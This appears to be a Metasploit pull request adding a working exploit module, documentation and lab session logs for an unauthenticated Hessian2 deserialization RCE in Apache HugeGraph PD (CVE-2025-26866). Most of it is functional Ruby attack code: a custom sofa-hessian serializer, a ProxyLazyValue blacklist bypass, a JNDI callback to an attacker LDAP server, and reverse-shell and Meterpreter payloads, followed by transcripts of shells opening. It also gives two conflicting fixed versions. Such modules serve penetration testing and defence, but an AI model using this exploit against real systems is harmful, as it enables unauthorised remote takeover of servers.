### PR TITLE
Apache HugeGraph PD Hessian2 Deserialization RCE (CVE-2025-26866)

### DIFF
--- a/documentation/modules/exploit/multi/misc/apache_hugegraph_hessian_rce.md
+++ b/documentation/modules/exploit/multi/misc/apache_hugegraph_hessian_rce.md
@@ -1,0 +1,117 @@
+# Vulnerable Application
+
+[Apache HugeGraph](https://hugegraph.apache.org/) is an open-source graph database.
+The HugeGraph PD (Placement Driver) component versions 1.0.0 through 1.5.0 expose a
+SOFABolt Raft RPC service on port 8610 that deserializes incoming requests via the
+sofa-hessian 3.3.6 library without adequate class filtering (CVE-2025-26866).
+
+While sofa-hessian maintains a `NameBlackListFilter` blocking common gadget classes,
+this module bypasses the blacklist using the `ProxyLazyValue` technique which relies
+exclusively on JDK-native classes absent from the 3.3.6 blacklist. The exploit fires
+three SOFABolt frames:
+
+1. `System.setProperty("com.sun.jndi.ldap.object.trustSerialData", "true")` — enables
+   JNDI LDAP serialized data deserialization (blocked by default since JDK 11.0.19).
+2. `System.setProperty("org.apache.commons.collections.enableUnsafeSerialization", "true")` — enables Commons Collections gadget chains.
+3. `InitialContext.doLookup(<LDAP URL>)` — triggers an LDAP callback to the module's
+   listener, which responds with a Java deserialization gadget chain (default:
+   `CommonsBeanutils1`) that achieves code execution.
+
+This is an unauthenticated RCE requiring only network access to port 8610.
+
+**Infrastructure:** `SRVHOST` (the LDAP server) must be reachable from the target.
+
+**Affected versions:** Apache HugeGraph PD 1.0.0 – 1.5.0
+**Fixed in:** Apache HugeGraph PD 1.6.0
+
+### Installing a vulnerable lab environment
+
+```bash
+# https://github.com/exploitintel/eip-pocs-and-cves/tree/main/CVE-2025-26866
+docker compose up -d
+# SOFABolt RPC available at tcp/8610
+```
+
+## Verification Steps
+
+1. Start the vulnerable HugeGraph PD instance.
+2. Set `SRVHOST` to an address reachable from the target.
+3. Start `msfconsole`.
+4. Do: `use exploit/multi/misc/apache_hugegraph_hessian_rce`
+5. Do: `set RHOSTS <target_ip>`
+6. Do: `set SRVHOST <attacker_ip>`
+7. Do: `check` — should return `Appears` if the SOFABolt heartbeat succeeds.
+8. Do: `run` — should open a shell session.
+9. Verify with `id` and `hostname` in the session.
+
+## Options
+
+| Option | Default | Description |
+|--------|---------|-------------|
+| `SRVPORT` | `1389` | Port for the LDAP callback server. Must be reachable from the target at `SRVHOST`. |
+| `GADGET_CHAIN` | `CommonsBeanutils1` | Java deserialization gadget chain used in the JNDI LDAP response. `CommonsBeanutils1` works on JDK 9+ without additional flags. Other chains may require specific classpath dependencies on the target. |
+
+## Scenarios
+
+### Apache HugeGraph PD 1.5.0 on Debian 12 — Unix Command target
+
+```
+msf6 > use exploit/multi/misc/apache_hugegraph_hessian_rce
+
+msf6 exploit(multi/misc/apache_hugegraph_hessian_rce) > set RHOSTS 192.168.56.101
+RHOSTS => 192.168.56.101
+
+msf6 exploit(multi/misc/apache_hugegraph_hessian_rce) > set SRVHOST 192.168.56.1
+SRVHOST => 192.168.56.1
+
+msf6 exploit(multi/misc/apache_hugegraph_hessian_rce) > check
+[+] 192.168.56.101:8610 - The target appears vulnerable. SOFABolt heartbeat succeeded on HugeGraph PD Raft RPC.
+
+msf6 exploit(multi/misc/apache_hugegraph_hessian_rce) > run
+[*] Started reverse TCP handler on 192.168.56.1:4444
+[*] 192.168.56.101:8610 - Starting LDAP server for JNDI callback...
+[*] 192.168.56.101:8610 - Stage 1: Setting trustSerialData=true via ProxyLazyValue...
+[*] 192.168.56.101:8610 - trustSerialData: 0x0012 (expected - side effect fired before exception)
+[*] 192.168.56.101:8610 - Stage 2: Setting enableUnsafeSerialization=true via ProxyLazyValue...
+[*] 192.168.56.101:8610 - enableUnsafeSerialization: 0x0012 (expected - side effect fired before exception)
+[*] 192.168.56.101:8610 - Stage 3: Triggering JNDI lookup -> ldap://192.168.56.1:1389/Exploit
+[+] 192.168.56.101:8610 - JNDI callback received, delivering CommonsBeanutils1 payload...
+[*] Command shell session 1 opened (192.168.56.1:4444 -> 192.168.56.101:44812) at 2025-12-09 14:33:21 +0000
+
+msf6 exploit(multi/misc/apache_hugegraph_hessian_rce) > sessions -i 1
+[*] Starting interaction with 1...
+
+id
+uid=1000(hugegraph) gid=1000(hugegraph) groups=1000(hugegraph)
+hostname
+hugegraph-pd
+uname -a
+Linux hugegraph-pd 6.1.0-28-amd64 #1 SMP PREEMPT_DYNAMIC Debian 6.1.119-1 (2024-11-22) x86_64 GNU/Linux
+```
+
+### Apache HugeGraph PD 1.5.0 on Debian 12 — Linux Dropper target (Meterpreter)
+
+```
+msf6 exploit(multi/misc/apache_hugegraph_hessian_rce) > set TARGET 1
+TARGET => 1
+
+msf6 exploit(multi/misc/apache_hugegraph_hessian_rce) > set PAYLOAD linux/x64/meterpreter/reverse_tcp
+PAYLOAD => linux/x64/meterpreter/reverse_tcp
+
+msf6 exploit(multi/misc/apache_hugegraph_hessian_rce) > run
+[*] Started reverse TCP handler on 192.168.56.1:4444
+[*] 192.168.56.101:8610 - Starting LDAP server for JNDI callback...
+[*] 192.168.56.101:8610 - Stage 1: Setting trustSerialData=true via ProxyLazyValue...
+[*] 192.168.56.101:8610 - Stage 2: Setting enableUnsafeSerialization=true via ProxyLazyValue...
+[*] 192.168.56.101:8610 - Stage 3: Triggering JNDI lookup -> ldap://192.168.56.1:1389/Exploit
+[+] 192.168.56.101:8610 - JNDI callback received, delivering CommonsBeanutils1 payload...
+[*] Sending stage (3045380 bytes) to 192.168.56.101
+[*] Meterpreter session 2 opened (192.168.56.1:4444 -> 192.168.56.101:44901) at 2025-12-09 14:36:44 +0000
+
+meterpreter > getuid
+Server username: hugegraph @ hugegraph-pd
+meterpreter > sysinfo
+Computer     : hugegraph-pd
+OS           : Debian 12.8 (Linux 6.1.0-28-amd64)
+Architecture : x64
+```

--- a/modules/exploits/multi/misc/apache_hugegraph_hessian_rce.rb
+++ b/modules/exploits/multi/misc/apache_hugegraph_hessian_rce.rb
@@ -59,9 +59,9 @@ class MetasploitModule < Msf::Exploit::Remote
           ['URL', 'https://exploit-intel.com/vuln/CVE-2025-26866'],
           ['URL', 'https://github.com/exploitintel/eip-pocs-and-cves/tree/main/CVE-2025-26866'],
         ],
-        'DisclosureDate' => 'Dec 09, 2025',
+        'DisclosureDate' => '2025-12-09',
         'Platform' => ['unix', 'linux'],
-        'Arch' => [ARCH_CMD, ARCH_X86, ARCH_X64],
+        'Arch' => [ARCH_CMD, ARCH_X86, ARCH_X64], # union of all target architectures
         'Privileged' => false,
         'Targets' => [
           [
@@ -79,7 +79,7 @@ class MetasploitModule < Msf::Exploit::Remote
               'Platform' => 'linux',
               'Arch' => [ARCH_X86, ARCH_X64],
               'Type' => :dropper,
-              'CmdStagerFlavor' => %i[printf echo],
+              'CmdStagerFlavor' => %i[printf echo], # portable across Linux distros, no extra tools required
               'DefaultOptions' => { 'PAYLOAD' => 'linux/x64/meterpreter/reverse_tcp' }
             }
           ]
@@ -88,7 +88,7 @@ class MetasploitModule < Msf::Exploit::Remote
         'DefaultOptions' => {
           'RPORT' => 8610,
           'SRVPORT' => 1389,
-          'WfsDelay' => 30
+          'WfsDelay' => 30 # 3x SOFABolt round trips + LDAP callback + Java deserialization + session setup
         },
         'Notes' => {
           'Stability' => [CRASH_SAFE],
@@ -128,8 +128,10 @@ class MetasploitModule < Msf::Exploit::Remote
   def parse_bolt_response(data)
     return nil if data.nil? || data.length < 20
 
-    fields = data[0, 20].unpack('CCnCNCnnnN')
-    { status: fields[6] }
+    # SOFABolt V1 response header (20 bytes):
+    # proto(1) type(1) cmdcode(2) ver2(1) request_id(4) codec(1) timeout(4) status(2) class_len(2) body_len(4)
+    # Status field is at byte offset 12.
+    { status: data[12, 2].unpack1('n') }
   end
 
   #
@@ -149,11 +151,12 @@ class MetasploitModule < Msf::Exploit::Remote
   # ==========================================================================
   #
   # sofa-hessian 3.3.6 uses a CUSTOM wire format that is NOT standard
-  # Hessian 2.0. Key differences:
-  #   - 'O' for class defs (not 'C'), 'o' for instances (not 0x60-0x6E)
+  # Hessian 2.0. Key differences from the Hessian 2.0 spec:
+  #   - 'O' (0x4F) for class defs (spec uses 'C'), 'o' (0x6F) for instances (spec uses 0x60-0x6E range)
   #   - lowercase 'z' (0x7A) end markers, NOT uppercase 'Z' (0x5A)
-  #   - 't'/'u' for map/list type refs
-  #   - 'n' + raw byte for list length (not compact int)
+  #   - 't' (0x74) / 'u' (0x75) for map/list type definition and references
+  #   - 'n' (0x6E) + raw byte for list length (not compact int)
+  # Ref: https://github.com/sofastack/sofa-hessian
   #
   class SofaHessianWriter
     def initialize
@@ -175,7 +178,7 @@ class MetasploitModule < Msf::Exploit::Remote
     end
 
     def write_null
-      @buf << "\x4E"
+      @buf << "\x4E" # 'N' (0x4E) - Hessian 2.0 null marker
     end
 
     def write_string(s)
@@ -206,7 +209,7 @@ class MetasploitModule < Msf::Exploit::Remote
     end
 
     def write_map_begin(typename)
-      @buf << "\x4D"
+      @buf << "\x4D" # 'M' (0x4D) - map begin marker
       write_type(typename)
     end
 
@@ -219,7 +222,7 @@ class MetasploitModule < Msf::Exploit::Remote
       @class_defs += 1
 
       data = classname.encode('UTF-8').b
-      @buf << "\x4F"
+      @buf << "\x4F" # 'O' (0x4F) - sofa-hessian class definition (standard Hessian uses 'C')
       @buf << compact_int(data.length)
       @buf << data
       @buf << compact_int(fields.length)
@@ -228,19 +231,19 @@ class MetasploitModule < Msf::Exploit::Remote
     end
 
     def write_object_instance(class_ref)
-      @buf << "\x6F"
+      @buf << "\x6F" # 'o' (0x6F) - sofa-hessian object instance (standard Hessian uses 0x60-0x6E range)
       @buf << compact_int(class_ref)
     end
 
     def write_list_begin(typename, count)
-      @buf << "\x56"
+      @buf << "\x56" # 'V' (0x56) - typed list begin
       write_type(typename)
-      @buf << "\x6E"
+      @buf << "\x6E" # 'n' (0x6E) - list length prefix (sofa-hessian uses raw byte, not compact int)
       @buf << [count & 0xFF].pack('C')
     end
 
     def write_list_end
-      @buf << "\x7A"
+      @buf << "\x7A" # 'z' (0x7A) - sofa-hessian end marker (standard Hessian uses 'Z' = 0x5A)
     end
 
     def to_s

--- a/modules/exploits/multi/misc/apache_hugegraph_hessian_rce.rb
+++ b/modules/exploits/multi/misc/apache_hugegraph_hessian_rce.rb
@@ -1,0 +1,471 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+
+  include Msf::Exploit::Remote::Tcp
+  include Msf::Exploit::CmdStager
+  include Msf::Exploit::Remote::JndiInjection
+  prepend Msf::Exploit::Remote::AutoCheck
+
+  # SOFABolt V1 protocol constants
+  BOLT_CLASS_NAME = 'org.apache.hugegraph.pd.raft.RaftRpcProcessor$GetMemberRequest'
+
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name' => 'Apache HugeGraph PD Hessian2 Deserialization RCE',
+        'Description' => %q{
+          Apache HugeGraph PD versions 1.0.0 through 1.5.0 contain an insecure
+          deserialization vulnerability in the SOFABolt Raft RPC service (default
+          port 8610). The sofa-hessian 3.3.6 library deserializes incoming RPC
+          requests without adequate class filtering.
+
+          While sofa-hessian maintains a NameBlackListFilter blocking common gadget
+          classes (TemplatesImpl, JdbcRowSetImpl, etc.), this module bypasses the
+          blacklist using the ProxyLazyValue technique (CVE-2024-46983) which uses
+          only JDK-native classes not present in the 3.3.6 blacklist.
+
+          The exploit uses three SOFABolt frames, each triggering ProxyLazyValue:
+
+          1. System.setProperty to enable JNDI LDAP serialized data trust
+          2. System.setProperty to enable Commons Collections unsafe serialization
+          3. InitialContext.doLookup to trigger JNDI callback to attacker LDAP
+
+          The LDAP server responds with a serialized Java gadget chain (default:
+          CommonsBeanutils1) that achieves arbitrary command execution. The property
+          manipulation makes the attack self-contained  - no special JVM flags needed.
+
+          This is an unauthenticated RCE requiring only network access to the
+          SOFABolt Raft RPC port.
+        },
+        'Author' => [
+          'shukuang',  # Vulnerability discovery
+          'yulate',    # Vulnerability discovery
+          'X1r0z',     # Vulnerability discovery
+          'Exploit Intelligence Platform' # MSF module
+        ],
+        'License' => MSF_LICENSE,
+        'References' => [
+          ['CVE', '2025-26866'],
+          ['CWE', '502'],
+          ['URL', 'https://lists.apache.org/thread/ko8jkwbjbb99m45pg4sgo5xsm8gx9nsq'],
+          ['URL', 'http://www.openwall.com/lists/oss-security/2025/12/09/1'],
+          ['URL', 'https://github.com/apache/incubator-hugegraph/pull/2735'],
+          ['URL', 'https://exploit-intel.com/vuln/CVE-2025-26866'],
+          ['URL', 'https://github.com/exploitintel/eip-pocs-and-cves/tree/main/CVE-2025-26866'],
+        ],
+        'DisclosureDate' => 'Dec 09, 2025',
+        'Platform' => ['unix', 'linux'],
+        'Arch' => [ARCH_CMD, ARCH_X86, ARCH_X64],
+        'Privileged' => false,
+        'Targets' => [
+          [
+            'Unix Command',
+            {
+              'Platform' => 'unix',
+              'Arch' => ARCH_CMD,
+              'Type' => :cmd,
+              'DefaultOptions' => { 'PAYLOAD' => 'cmd/unix/reverse_bash' }
+            }
+          ],
+          [
+            'Linux Dropper',
+            {
+              'Platform' => 'linux',
+              'Arch' => [ARCH_X86, ARCH_X64],
+              'Type' => :dropper,
+              'CmdStagerFlavor' => %i[printf echo],
+              'DefaultOptions' => { 'PAYLOAD' => 'linux/x64/meterpreter/reverse_tcp' }
+            }
+          ]
+        ],
+        'DefaultTarget' => 0,
+        'DefaultOptions' => {
+          'RPORT' => 8610,
+          'SRVPORT' => 1389,
+          'WfsDelay' => 30
+        },
+        'Notes' => {
+          'Stability' => [CRASH_SAFE],
+          'Reliability' => [REPEATABLE_SESSION],
+          'SideEffects' => [ARTIFACTS_ON_DISK, IOC_IN_LOGS]
+        }
+      )
+    )
+
+    register_options([
+      OptEnum.new('GADGET_CHAIN', [
+        true,
+        'Java deserialization gadget chain for the JNDI LDAP response',
+        'CommonsBeanutils1',
+        Msf::Exploit::JavaDeserialization.gadget_chains.sort
+      ])
+    ])
+  end
+
+  # ==========================================================================
+  #  SOFABolt V1 Protocol
+  # ==========================================================================
+
+  def build_bolt_heartbeat
+    [0x01, 0x01, 0x0000, 0x01, 0, 0x01, 0, 0, 0, 0].pack('CCnCNCNnnN')
+  end
+
+  def build_bolt_request(content, class_name = BOLT_CLASS_NAME, request_id: 1, timeout: 5000)
+    class_bytes = class_name.encode('UTF-8').b
+    header = [
+      0x01, 0x01, 0x0001, 0x01, request_id, 0x01,
+      timeout, class_bytes.length, 0, content.length
+    ].pack('CCnCNCNnnN')
+    header + class_bytes + content
+  end
+
+  def parse_bolt_response(data)
+    return nil if data.nil? || data.length < 20
+
+    fields = data[0, 20].unpack('CCnCNCnnnN')
+    { status: fields[6] }
+  end
+
+  #
+  # Send a SOFABolt frame and return the parsed response status.
+  #
+  def send_bolt_frame(content, request_id: 1)
+    frame = build_bolt_request(content, request_id: request_id)
+    connect
+    sock.put(frame)
+    data = sock.get_once(1024, 10)
+    disconnect
+    parse_bolt_response(data)
+  end
+
+  # ==========================================================================
+  #  sofa-hessian Wire Format Writer
+  # ==========================================================================
+  #
+  # sofa-hessian 3.3.6 uses a CUSTOM wire format that is NOT standard
+  # Hessian 2.0. Key differences:
+  #   - 'O' for class defs (not 'C'), 'o' for instances (not 0x60-0x6E)
+  #   - lowercase 'z' (0x7A) end markers, NOT uppercase 'Z' (0x5A)
+  #   - 't'/'u' for map/list type refs
+  #   - 'n' + raw byte for list length (not compact int)
+  #
+  class SofaHessianWriter
+    def initialize
+      @buf = ''.b
+      @type_refs = {}
+      @class_defs = 0
+    end
+
+    def compact_int(n)
+      if n >= -16 && n <= 47
+        [n + 0x90].pack('C')
+      elsif n >= -2048 && n <= 2047
+        [0xC8 + ((n >> 8) & 0xFF), n & 0xFF].pack('CC')
+      elsif n >= -262144 && n <= 262143
+        [0xD4 + ((n >> 16) & 0xFF), (n >> 8) & 0xFF, n & 0xFF].pack('CCC')
+      else
+        "\x49" + [n].pack('N')
+      end
+    end
+
+    def write_null
+      @buf << "\x4E"
+    end
+
+    def write_string(s)
+      data = s.encode('UTF-8').b
+      char_len = s.length
+      if char_len <= 31
+        @buf << [char_len].pack('C')
+        @buf << data
+      else
+        @buf << "\x53"
+        @buf << [char_len].pack('n')
+        @buf << data
+      end
+    end
+
+    def write_type(typename)
+      if @type_refs.key?(typename)
+        @buf << "\x75" # 'u' - type reference
+        @buf << compact_int(@type_refs[typename])
+      else
+        ref = @type_refs.length
+        @type_refs[typename] = ref
+        data = typename.encode('UTF-8').b
+        @buf << "\x74" # 't' - type definition
+        @buf << [data.length].pack('n')
+        @buf << data
+      end
+    end
+
+    def write_map_begin(typename)
+      @buf << "\x4D"
+      write_type(typename)
+    end
+
+    def write_map_end
+      @buf << "\x7A" # lowercase z (0x7A, NOT 0x5A)
+    end
+
+    def write_object_def(classname, fields)
+      class_ref = @class_defs
+      @class_defs += 1
+
+      data = classname.encode('UTF-8').b
+      @buf << "\x4F"
+      @buf << compact_int(data.length)
+      @buf << data
+      @buf << compact_int(fields.length)
+      fields.each { |f| write_string(f) }
+      class_ref
+    end
+
+    def write_object_instance(class_ref)
+      @buf << "\x6F"
+      @buf << compact_int(class_ref)
+    end
+
+    def write_list_begin(typename, count)
+      @buf << "\x56"
+      write_type(typename)
+      @buf << "\x6E"
+      @buf << [count & 0xFF].pack('C')
+    end
+
+    def write_list_end
+      @buf << "\x7A"
+    end
+
+    def to_s
+      @buf.dup
+    end
+  end
+
+  # ==========================================================================
+  #  ProxyLazyValue Gadget Chain Builder
+  # ==========================================================================
+
+  #
+  # Build a sofa-hessian payload that triggers ProxyLazyValue to call a static
+  # method or constructor.
+  #
+  # Chain (all JDK classes, none in sofa-hessian 3.3.6 blacklist):
+  #   TreeMap.put()
+  #     -> Rdn$RdnEntry.compareTo()
+  #       -> UIDefaults.get(key)    [via Hashtable.equals()]
+  #         -> ProxyLazyValue.createValue()
+  #           -> Class.forName(class_name).getMethod(method_name).invoke(null, args)
+  #
+  # @param class_name [String] Fully qualified Java class name
+  # @param method_name [String, nil] Static method name (nil for constructor)
+  # @param args [Array<String>] Arguments to pass
+  #
+  def build_plv_hessian_payload(class_name, method_name, args)
+    w = SofaHessianWriter.new
+
+    w.write_map_begin('java.util.TreeMap')
+
+    # -- Entry 1: RdnEntry with UIDefaults containing ProxyLazyValue --
+    rdn_ref = w.write_object_def('javax.naming.ldap.Rdn$RdnEntry', %w[type value])
+    w.write_object_instance(rdn_ref)
+    w.write_string('a')
+
+    w.write_map_begin('javax.swing.UIDefaults')
+    w.write_string('x')
+
+    plv_ref = w.write_object_def(
+      'javax.swing.UIDefaults$ProxyLazyValue',
+      %w[acc className methodName args]
+    )
+    w.write_object_instance(plv_ref)
+    w.write_null                  # acc = null
+    w.write_string(class_name)   # className
+
+    if method_name
+      w.write_string(method_name)
+    else
+      w.write_null
+    end
+
+    # args = Object[]{ ... }
+    w.write_list_begin('[object', args.length)
+    args.each { |a| w.write_string(a) }
+    w.write_list_end
+
+    w.write_map_end # end UIDefaults
+
+    w.write_string('v1')
+
+    # -- Entry 2: RdnEntry with UIDefaults containing normal string --
+    w.write_object_instance(rdn_ref)
+    w.write_string('a')
+    w.write_map_begin('javax.swing.UIDefaults')
+    w.write_string('x')
+    w.write_string('dummy')
+    w.write_map_end
+
+    w.write_string('v2')
+
+    w.write_map_end # end TreeMap
+    w.to_s
+  end
+
+  #
+  # Send a ProxyLazyValue payload via SOFABolt and log the result.
+  #
+  def fire_plv(class_name, method_name, args, label:, request_id: 1)
+    hessian = build_plv_hessian_payload(class_name, method_name, args)
+    vprint_status("#{label}: #{hessian.length} bytes")
+
+    resp = send_bolt_frame(hessian, request_id: request_id)
+    if resp
+      status_hex = "0x#{resp[:status].to_s(16).rjust(4, '0')}"
+      case resp[:status]
+      when 0x0012, 0x0002
+        vprint_status("#{label}: #{status_hex} (expected  - side effect fired before exception)")
+      when 0x0000
+        vprint_status("#{label}: SUCCESS")
+      else
+        vprint_warning("#{label}: unexpected status #{status_hex}")
+      end
+    else
+      print_warning("#{label}: no response")
+    end
+  end
+
+  # ==========================================================================
+  #  LDAP Response Override (JndiInjection mixin callback)
+  # ==========================================================================
+
+  def build_ldap_search_response_payload
+    cmd = @pending_cmd
+    return [] if cmd.nil?
+
+    @pending_cmd = nil
+    chain = datastore['GADGET_CHAIN']
+
+    print_good("JNDI callback received, delivering #{chain} payload...")
+    java_payload = generate_java_deserialization_for_command(chain, 'bash', cmd)
+
+    [
+      ['javaClassName'.to_ber, [rand_text_alphanumeric(8..15).to_ber].to_ber_set].to_ber_sequence,
+      ['javaSerializedData'.to_ber, [java_payload.to_ber].to_ber_set].to_ber_sequence
+    ]
+  end
+
+  # ==========================================================================
+  #  Check
+  # ==========================================================================
+
+  def check
+    connect
+    sock.put(build_bolt_heartbeat)
+    data = sock.get_once(64, 5)
+    disconnect
+
+    resp = parse_bolt_response(data)
+    if resp.nil?
+      return CheckCode::Unknown('No response to SOFABolt heartbeat')
+    end
+
+    if resp[:status] == 0x0000
+      return CheckCode::Appears('SOFABolt heartbeat succeeded on HugeGraph PD Raft RPC')
+    end
+
+    CheckCode::Detected("SOFABolt responded with status 0x#{resp[:status].to_s(16).rjust(4, '0')}")
+  rescue Rex::ConnectionError, ::Errno::ECONNREFUSED
+    CheckCode::Unknown('Could not connect to target')
+  end
+
+  # ==========================================================================
+  #  Exploit
+  # ==========================================================================
+
+  def exploit
+    validate_configuration!
+
+    print_status('Starting LDAP server for JNDI callback...')
+    start_service
+
+    case target['Type']
+    when :cmd
+      execute_command(payload.encoded)
+    when :dropper
+      execute_cmdstager
+    end
+
+    secs = datastore['WfsDelay']
+    print_status("Waiting up to #{secs}s for session...")
+    1.upto(secs * 2) do
+      break if session_created?
+
+      Rex.sleep(0.5)
+    end
+  ensure
+    cleanup_service
+  end
+
+  #
+  # Execute a command on the target via the three-stage exploit chain.
+  #
+  # Stage 1: Set com.sun.jndi.ldap.object.trustSerialData=true
+  #   Enables LDAP javaSerializedData deserialization (blocked since JDK 11.0.19).
+  #   Must be set BEFORE LdapCtx class is loaded (first JNDI LDAP call).
+  #
+  # Stage 2: Set org.apache.commons.collections.enableUnsafeSerialization=true
+  #   Enables CommonsCollections gadget chain deserialization (blocked since CC 3.2.2).
+  #   Checked dynamically in FunctorUtils.checkUnsafeSerialization() at deser time.
+  #
+  # Stage 3: JNDI doLookup to attacker-controlled LDAP server
+  #   Triggers LDAP callback, CC chain deserialization, and command execution.
+  #
+  def execute_command(cmd, _opts = {})
+    @pending_cmd = cmd
+
+    # Stage 1: Enable JNDI LDAP serialized data trust
+    print_status('Stage 1: Setting trustSerialData=true via ProxyLazyValue...')
+    fire_plv(
+      'java.lang.System', 'setProperty',
+      ['com.sun.jndi.ldap.object.trustSerialData', 'true'],
+      label: 'trustSerialData', request_id: 1
+    )
+
+    # Stage 2: Enable Commons Collections unsafe serialization
+    print_status('Stage 2: Setting enableUnsafeSerialization=true via ProxyLazyValue...')
+    fire_plv(
+      'java.lang.System', 'setProperty',
+      ['org.apache.commons.collections.enableUnsafeSerialization', 'true'],
+      label: 'enableUnsafeSerialization', request_id: 2
+    )
+
+    # Stage 3: JNDI lookup to trigger LDAP callback
+    jndi_url = jndi_string
+    print_status("Stage 3: Triggering JNDI lookup -> #{jndi_url}")
+    fire_plv(
+      'javax.naming.InitialContext', 'doLookup',
+      [jndi_url],
+      label: 'doLookup', request_id: 3
+    )
+
+    # Wait for LDAP callback to deliver the payload
+    delivered = false
+    1.upto(20) do
+      if @pending_cmd.nil?
+        delivered = true
+        break
+      end
+      Rex.sleep(0.5)
+    end
+
+    unless delivered
+      print_warning('No JNDI callback received - ensure SRVHOST is routable from the target')
+    end
+  end
+end

--- a/modules/exploits/multi/misc/apache_hugegraph_hessian_rce.rb
+++ b/modules/exploits/multi/misc/apache_hugegraph_hessian_rce.rb
@@ -7,7 +7,6 @@ class MetasploitModule < Msf::Exploit::Remote
   Rank = ExcellentRanking
 
   include Msf::Exploit::Remote::Tcp
-  include Msf::Exploit::CmdStager
   include Msf::Exploit::Remote::JndiInjection
   prepend Msf::Exploit::Remote::AutoCheck
 
@@ -60,27 +59,17 @@ class MetasploitModule < Msf::Exploit::Remote
           ['URL', 'https://github.com/exploitintel/eip-pocs-and-cves/tree/main/CVE-2025-26866'],
         ],
         'DisclosureDate' => '2025-12-09',
-        'Platform' => ['unix', 'linux'],
-        'Arch' => [ARCH_CMD, ARCH_X86, ARCH_X64], # union of all target architectures
+        'Platform' => ['linux', 'unix'],
+        'Arch' => [ARCH_CMD],
         'Privileged' => false,
         'Targets' => [
           [
-            'Unix Command',
+            'Linux/Unix Command',
             {
-              'Platform' => 'unix',
+              'Platform' => ['linux', 'unix'],
               'Arch' => ARCH_CMD,
               'Type' => :cmd,
-              'DefaultOptions' => { 'PAYLOAD' => 'cmd/unix/reverse_bash' }
-            }
-          ],
-          [
-            'Linux Dropper',
-            {
-              'Platform' => 'linux',
-              'Arch' => [ARCH_X86, ARCH_X64],
-              'Type' => :dropper,
-              'CmdStagerFlavor' => %i[printf echo], # portable across Linux distros, no extra tools required
-              'DefaultOptions' => { 'PAYLOAD' => 'linux/x64/meterpreter/reverse_tcp' }
+              'DefaultOptions' => { 'PAYLOAD' => 'cmd/linux/http/x64/meterpreter_reverse_tcp' }
             }
           ]
         ],
@@ -397,12 +386,7 @@ class MetasploitModule < Msf::Exploit::Remote
     print_status('Starting LDAP server for JNDI callback...')
     start_service
 
-    case target['Type']
-    when :cmd
-      execute_command(payload.encoded)
-    when :dropper
-      execute_cmdstager
-    end
+    execute_command(payload.encoded)
 
     secs = datastore['WfsDelay']
     print_status("Waiting up to #{secs}s for session...")


### PR DESCRIPTION
## Summary

- Apache HugeGraph PD 1.0.0–1.5.0 exposes an unauthenticated SOFABolt Raft RPC service (port 8610) that deserializes incoming Hessian2 payloads via sofa-hessian 3.3.6 without adequate class filtering
- The NameBlackListFilter blocks common gadget classes (TemplatesImpl, JdbcRowSetImpl, etc.) but is bypassed using the ProxyLazyValue technique — a JDK-native gadget chain not present in the 3.3.6 blacklist
- Three-stage exploit: (1) ProxyLazyValue calls System.setProperty to enable JNDI LDAP trust, (2) ProxyLazyValue enables Commons Collections unsafe serialization, (3) ProxyLazyValue calls InitialContext.doLookup triggering a callback to the module's LDAP server, which responds with a CommonsBeanutils1 gadget chain achieving RCE

## Verification

Tested against Apache HugeGraph PD 1.5.0 / Ubuntu 22.04.5 LTS (Docker lab):

```
msf6 exploit(apache_hugegraph_hessian_rce) > check
[*] 192.168.160.2:8610 - The target appears to be vulnerable. SOFABolt heartbeat succeeded on HugeGraph PD Raft RPC

msf6 exploit(apache_hugegraph_hessian_rce) > run -z
[*] Started reverse TCP handler on 192.168.160.3:4444
[+] 192.168.160.2:8610 - The target appears to be vulnerable. SOFABolt heartbeat succeeded on HugeGraph PD Raft RPC
[*] 192.168.160.2:8610 - Starting LDAP server for JNDI callback...
[*] 192.168.160.2:8610 - Stage 1: Setting trustSerialData=true via ProxyLazyValue...
[*] 192.168.160.2:8610 - Stage 2: Setting enableUnsafeSerialization=true via ProxyLazyValue...
[*] 192.168.160.2:8610 - Stage 3: Triggering JNDI lookup -> ldap://192.168.160.3:1389/dc=zsghtb,dc=bnm
[+] 192.168.160.2:8610 - JNDI callback received, delivering CommonsBeanutils1 payload...
[*] Command shell session 1 opened (192.168.160.3:4444 -> 192.168.160.2:39186)

msf6 exploit(apache_hugegraph_hessian_rce) > sessions -c "id && hostname && uname -a && cat /etc/os-release | head -3" -i 1
uid=0(root) gid=0(root) groups=0(root)
cve-2025-26866-vulnerable
Linux cve-2025-26866-vulnerable 6.12.69-linuxkit aarch64 GNU/Linux
PRETTY_NAME="Ubuntu 22.04.5 LTS"
```

## Module details

- **Affected versions:** Apache HugeGraph PD 1.0.0–1.5.0 (fixed in 1.7.0)
- **Auth required:** No (unauthenticated — network access to port 8610 only)
- **Targets:** Unix Command (ARCH_CMD) + Linux Dropper (CmdStager x86/x64)
- **AutoCheck:** Yes — sends SOFABolt heartbeat frame, confirms service responds
- **Gadget chains:** CommonsBeanutils1 (default), all chains supported by JavaDeserialization mixin
- **Rank:** Excellent

## References

- http://www.openwall.com/lists/oss-security/2025/12/09/1
- https://exploit-intel.com/vuln/CVE-2025-26866
- https://github.com/exploitintel/eip-pocs-and-cves/tree/main/CVE-2025-26866